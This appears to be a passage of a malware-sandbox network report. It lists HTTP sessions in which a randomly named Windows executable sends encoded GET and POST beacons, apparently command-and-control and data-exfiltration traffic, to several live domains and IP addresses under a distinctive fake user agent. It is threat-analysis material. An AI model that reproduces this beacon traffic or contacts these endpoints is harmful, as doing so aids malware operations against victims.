                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.7 | 49975 | 84.32.84.32 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:23.317295074 CET | 492 | OUT | GET /zaz4/?ptH8A6=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvD59p2x79JGj8+Yz9VVRMgvDTsTucbTnzBoQzXIZ9OSEU5EpWd7+rj1U&e4M=Tfa0_jE0 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.promocao.info
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 13, 2025 15:12:23.765716076 CET | 1236 | IN | HTTP/1.1 200 OK
                                              Date: Mon, 13 Jan 2025 14:12:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 9973
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Server: hcdn
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: d6b435b30d38f4f086bc470ba4a8a39e-bos-edge3
                                              Expires: Mon, 13 Jan 2025 14:12:22 GMT
                                              Cache-Control: no-cache
                                              Accept-Ranges: bytes
                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title> [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.7 | 49976 | 104.21.18.171 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:28.825917959 CET | 751 | OUT | POST /kxtt/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.grimbo.boats
                                              Origin: http://www.grimbo.boats
                                              Cache-Control: max-age=0
                                              Content-Length: 219
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.grimbo.boats/kxtt/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr4v1LIB0XqCPSv9b8ij0IeRPR9kHPU9Lo85OV6ID6y5Y8gYf3Bw==
                                              Jan 13, 2025 15:12:29.500003099 CET | 1090 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:29 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRmZ9nQhzZ1ed1fDgmXGma8fB955uWuMTV8O1iz8AqD2aGDGSMd9dvFv%2BK29jSV8Zx%2BJYsY4Df0V%2FXyim2dUT2l11S%2BCFzCwQn0Q5XRMz8uMGny9xBlGyjN0zGAdNHwofnJi"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 9015fb42dde8de94-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1626&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.7 | 49977 | 104.21.18.171 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:31.365685940 CET | 771 | OUT | POST /kxtt/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.grimbo.boats
                                              Origin: http://www.grimbo.boats
                                              Cache-Control: max-age=0
                                              Content-Length: 239
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.grimbo.boats/kxtt/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAA3q5mj5DbWd+4KN3q3btO9WtK+zXBmfZ759cC7BPymBh4B31lM=
                                              Jan 13, 2025 15:12:32.012839079 CET | 1091 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:31 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dAi78G7bk18YaOPZQcAA5oxz2RaU3O%2BtaYxPTSCc2V%2BAbngqXXTQtTAS%2FuMJtCNFF6U3pfEqHgU7WyvxgthiSmh8ugeXSgldG53n55%2BM6uI2WvZAnrr4JBRpn1SBkGtI4mnI"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 9015fb527da98c1b-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2004&rtt_var=1002&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.7 | 49978 | 104.21.18.171 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:33.913347960 CET | 1784 | OUT | POST /kxtt/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.grimbo.boats
                                              Origin: http://www.grimbo.boats
                                              Cache-Control: max-age=0
                                              Content-Length: 1251
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.grimbo.boats/kxtt/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEOPWvevH4LDuEYFQXVlnRLqFtq6q12vnXCFKe/EOWyM/lhB3G8I1mj4JGwMcsa242ziuHQ8l7NXV1/srSkQg0uE8gXysZLfKud8wdTGXpF/dMw4ATI3slXbexc51PQAMoATtiNKHvCg4aQrI9AzYV4Cv+LqP+9TOn99Jj8WwcFjtO5F5EAPVElHLwqBp3BrM9TWsSohKfY5YLr5/YqdHAHcouRaSuy1n97PhtcaVqkmf5Nc2romVj+9D31v57SQA2SNH7Ja1pcZZlh0qbaBb7qwRa8SOx1Pu42ckQmKJCk6h3ycOIzLePq1kYUmhhKbuy4x9/9Zv6XPIdh3ZNiF531MKhg1mY6Q1k7w8mix63CJj0ZTCRGlPZLdJU4JnXXLmQenH+Ws27p6nseEYe+/tVTldM+TnzFKtB2CW4rUy37ZiThnNr5MftE/swysbmNnMJzHuNFjn4Qfxl200httiMmuZxsYj8DAv071O7zJoRsBFvEgNp8odCkZq64FbvJoEC5/jcSnJR+IiQ0PUVdBWTogvl3jRTrO5VhO+DlEt4P4JxHrzFdqo7gjGS480CE0xORc606Km4qtfKs4gbOFFP4J7dgwlxmqPN032YN/A/FG5+ocjbc/Rd7EEjM876+Ok+IfWkR091wAbEAq0gtp/TIzkWpJGUvsOBnX0kAA0Ryy2nlGpjxM4BhALEfw4WZmBTRx2V0Cimt37YvqT3s7a2pQj50e1s3/Ac+ht0Jjp1MX2eNbLEgaWhOqLIGfBDNvK0FlQndPM62OFgHkiUPVOdPTX0deNAo494RBrDp7ol8/gVrzYoDc4qTfBIXYhxAjMLLl6Me1/mGEUeOMEgXsmH0rCLDaVmc6z32Duh/iPh3rJ2qp4p3hUQkhVxtDi1f/4LRk2zJCXCSGq4MfNNmngJq05+QR5Dc0+dvg8XxnrFSfoQKvQ/JDksvswcQcb8jBH9lgnB [TRUNCATED]
                                              Jan 13, 2025 15:12:34.546976089 CET | 1093 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:34 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J9omE8MKObYe0UkPT6VTD%2FnAekwE6cI6KRXFcae1zDIlIuGFT1xyLyp%2FLzVWfp8AqGU%2BAw3jLfHzaPIybSK77YNaAK7SsQhZOuGy91nXB%2BZ0T%2BYlxNUdFe8rSoLNqI0lN3PW"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 9015fb625ce6c34b-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1494&rtt_var=747&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1784&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.7 | 49979 | 104.21.18.171 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:36.454006910 CET | 491 | OUT | GET /kxtt/?ptH8A6=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvRsCKtwsoTwtBRtOzLnbykrUVFpky7P5wYQuQ25a4dovtn3QHJaU3t1x&e4M=Tfa0_jE0 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.grimbo.boats
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 13, 2025 15:12:37.125741005 CET | 1101 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:37 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFktooRRtvOcfQxB8uMLEh8VT76xYSTAp0QHLyCuWOwB4GyirGnqQ%2BnsU53Ecbi286VCE9sAcmTkSHB6pqL%2F0%2FBF%2B8hmbYV4eabsaix5zCfY1IADLu6aIrPjdwosMRv1bY7E"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 9015fb727efec333-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1497&rtt_var=748&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.7 | 49980 | 134.122.135.48 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:43.022403002 CET | 748 | OUT | POST /a59t/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.44756.pizza
                                              Origin: http://www.44756.pizza
                                              Cache-Control: max-age=0
                                              Content-Length: 219
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.44756.pizza/a59t/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VpDkB28VqR5deiSJu/Nvm7ZPdmmJemVyaZ+6HpUCXCxAzRlqocQ==
                                              Jan 13, 2025 15:12:43.965837002 CET | 312 | IN | HTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Mon, 13 Jan 2025 14:12:43 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.7 | 49981 | 134.122.135.48 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:45.567640066 CET | 768 | OUT | POST /a59t/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.44756.pizza
                                              Origin: http://www.44756.pizza
                                              Cache-Control: max-age=0
                                              Content-Length: 239
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.44756.pizza/a59t/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlI3miktoxzvvb/+fk222dGlZc3LsKjfclZUf81o+y24EeZ3Ayog=
                                              Jan 13, 2025 15:12:46.485959053 CET | 312 | IN | HTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Mon, 13 Jan 2025 14:12:46 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.7 | 49982 | 134.122.135.48 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:48.131705999 CET | 1781 | OUT | POST /a59t/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.44756.pizza
                                              Origin: http://www.44756.pizza
                                              Cache-Control: max-age=0
                                              Content-Length: 1251
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.44756.pizza/a59t/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6= [TRUNCATED]
                                              Jan 13, 2025 15:12:49.063261032 CET | 312 | IN | HTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Mon, 13 Jan 2025 14:12:48 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.7 | 49983 | 134.122.135.48 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:50.674694061 CET | 490 | OUT | GET /a59t/?ptH8A6=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgPqUeDekfARjRUucHmZ6H68xhcA6aT153Xsmr+pfOOQ7uAfOZkFusVC3&e4M=Tfa0_jE0 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.44756.pizza
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 13, 2025 15:12:51.672843933 CET | 312 | IN | HTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Mon, 13 Jan 2025 14:12:51 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.7 | 49984 | 199.192.21.169 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:56.725663900 CET | 757 | OUT | POST /bowc/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.lonfor.website
                                              Origin: http://www.lonfor.website
                                              Cache-Control: max-age=0
                                              Content-Length: 219
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.lonfor.website/bowc/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAOrmDX37hQCdBafDm1T7PqKfluUhWCAb3HntSFsYklDWTDrJ4JQ==
                                              Jan 13, 2025 15:12:57.418040037 CET | 918 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:57 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.7 | 49985 | 199.192.21.169 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:59.279766083 CET | 777 | OUT | POST /bowc/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.lonfor.website
                                              Origin: http://www.lonfor.website
                                              Cache-Control: max-age=0
                                              Content-Length: 239
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.lonfor.website/bowc/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0bneqWFgVmGCFmpKIOsF60z5O5o8ftmhRX5bRL8IxsooSuutH5o=
                                              Jan 13, 2025 15:12:59.874948978 CET | 918 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:59 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.2.7 | 49986 | 199.192.21.169 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:13:01.824652910 CET | 1790 | OUT | POST /bowc/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.lonfor.website
                                              Origin: http://www.lonfor.website
                                              Cache-Control: max-age=0
                                              Content-Length: 1251
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.lonfor.website/bowc/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6= [TRUNCATED]
                                              Jan 13, 2025 15:13:02.589643002 CET | 918 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:13:02 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.2.7 | 49987 | 199.192.21.169 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:13:04.362180948 CET | 493 | OUT | GET /bowc/?e4M=Tfa0_jE0&ptH8A6=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwfh9UMCmV9sv26tPWfSpL+RY4eJUJjwe/OEwjvV/FXoNhKuiWFV4ToBJ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.lonfor.website
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 13, 2025 15:13:04.983576059 CET | 933 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:13:04 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
